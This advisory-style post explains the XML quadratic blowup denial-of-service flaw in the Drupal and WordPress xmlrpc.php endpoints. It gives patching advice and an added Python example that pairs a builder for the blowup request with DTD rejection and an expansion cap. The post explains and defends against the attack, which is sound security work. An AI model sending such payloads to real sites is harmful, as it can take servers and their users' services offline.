Drupal and WordPress Denial of Service

Drupal and WordPress are both vulnerable to a denial of service condition in their XML-RPC endpoint (xmlrpc.php), which accepts and parses attacker-supplied XML from anyone who can reach the site.

Details of the issue can be found on the official sites for Drupal and WordPress. Basically the attack works by sending an XML-RPC call to the remote site whose document is small on the wire but expands enormously when parsed: the internal DTD of the request declares a single entity holding a moderately large block of text, and the body of the request then references that one entity thousands of times. Because the parser materialises the entity's contents at every reference, the expanded document grows as (entity size × number of references) while the request itself only grows as (entity size + number of references).

How does this work in practice? A request of around 200 KB will expand to roughly 2.5 GB in memory on the remote server; this class of bug is known as an XML Quadratic Blowup attack (a relative of the "billion laughs" nested-entity attack, but without nesting, which is why simple nesting-depth limits do not stop it). Attempting to parse a handful of such requests in parallel consumes all available memory, so the application falls over and quite possibly the whole system with it.
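The following is an added example, not code from the original post or from either project: it models the quadratic-blowup request against an XML-RPC endpoint and the two checks a hardened endpoint applies. The method name `system.listMethods` and the element names follow the XML-RPC specification; the size figures used in the demo (entity of 100,000 bytes referenced 25,000 times, chosen to reproduce the page's ~200 KB in / 2.5 GB out ratio) are assumptions for illustration. The parser deliberately expands internal entities, as a stock parser does, so a hard cap on expanded size is enforced in the character-data handler and the demo never actually parses the large payload.

```python
"""Quadratic blowup against XML-RPC: payload model, stock-parser expansion, and two defences.

Added example; not the original post's PoC and not WordPress/Drupal code.
"""
import xml.parsers.expat


def build_xmlrpc_request(method: str, string_arg: str, dtd: str = "") -> bytes:
    """Minimal XML-RPC methodCall with one <string> parameter and an optional DTD prolog."""
    doc = (
        '<?xml version="1.0"?>\n'
        + dtd
        + "<methodCall>\n"
        f"  <methodName>{method}</methodName>\n"
        "  <params><param><value><string>"
        f"{string_arg}</string></value></param></params>\n"
        "</methodCall>\n"
    )
    return doc.encode("utf-8")


def build_blowup_request(entity_len: int, refs: int) -> bytes:
    """Quadratic blowup: ONE internal entity of entity_len bytes, referenced refs times.

    Wire size ~ entity_len + 3*refs; expanded size = entity_len * refs.
    No nesting is involved, so nesting-depth limits do not catch this.
    """
    dtd = f'<!DOCTYPE methodCall [\n  <!ENTITY x "{"A" * entity_len}">\n]>\n'
    return build_xmlrpc_request("system.listMethods", "&x;" * refs, dtd)


def amplification(entity_len: int, refs: int) -> tuple:
    """Return (bytes on the wire, bytes the parser must materialise for the string argument)."""
    return len(build_blowup_request(entity_len, refs)), entity_len * refs


def contains_dtd(payload: bytes) -> bool:
    """Defence 1: XML-RPC never needs a DTD, so reject any DOCTYPE/ENTITY declaration outright.

    XML keywords are case-sensitive, so the uppercase forms are the only valid spellings.
    """
    return b"<!DOCTYPE" in payload or b"<!ENTITY" in payload


def parse_string_arg(payload: bytes, max_expanded: int) -> int:
    """Parse like a stock expat-based parser (internal entities ARE expanded) and return the
    expanded length of the <string> argument.

    Defence 2: abort as soon as the expanded character data exceeds max_expanded bytes,
    so memory use is bounded by the cap rather than by the attacker's entity_len * refs.
    """
    parser = xml.parsers.expat.ParserCreate()
    state = {"in_string": False, "total": 0}

    def start(name, attrs):
        if name == "string":
            state["in_string"] = True

    def end(name):
        if name == "string":
            state["in_string"] = False

    def chars(data):
        if state["in_string"]:
            state["total"] += len(data)
            if state["total"] > max_expanded:
                # Raising inside a handler stops expat immediately; the exception
                # propagates out of Parse().
                raise ValueError("expanded XML exceeds cap of %d bytes" % max_expanded)

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(payload, True)
    return state["total"]


def safe_parse_string_arg(payload: bytes, max_expanded: int = 1_000_000) -> int:
    """What a hardened endpoint does: refuse DTDs up front, then parse under an expansion cap."""
    if contains_dtd(payload):
        raise ValueError("XML-RPC request containing a DTD rejected")
    return parse_string_arg(payload, max_expanded)


if __name__ == "__main__":
    # Small instance: 40-byte entity referenced 30 times expands to 1,200 bytes.
    small = build_blowup_request(40, 30)
    print("small payload on the wire:", len(small), "bytes; expanded:", parse_string_arg(small, 10_000))
    # The page's ratio, computed without ever parsing the large payload (assumed sizes).
    wire, expanded = amplification(100_000, 25_000)
    print("large payload on the wire: %d bytes -> %.1f GB expanded" % (wire, expanded / 1e9))
    try:
        safe_parse_string_arg(small)
    except ValueError as exc:
        print("hardened endpoint:", exc)
```

`contains_dtd` is the cheap check to apply first, since an XML-RPC request has no legitimate reason to carry a DOCTYPE; the expansion cap in `parse_string_arg` is the defence in depth for any parser that must accept entities, and it also caps the damage if the blowup arrives via a different parameter type than `<string>`.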

Using a simple proof of concept script it was possible to take down an entire site, and the operating system underneath it, within a few moments. The monitoring alert from the target host read:


“System running out of memory. Availability of the system is in risk.”


Unless you have previously disabled XML-RPC, or have patched your Drupal or WordPress installation in the last few days, you are currently exposed to this denial of service attack, and we would recommend that you update to the latest version of your framework as soon as possible. If you cannot patch immediately, block requests to xmlrpc.php at the web server (or, on WordPress, disable the service with the `xmlrpc_enabled` filter) until you can; note that a single request is enough to trigger the condition, so rate limiting alone is not an adequate mitigation.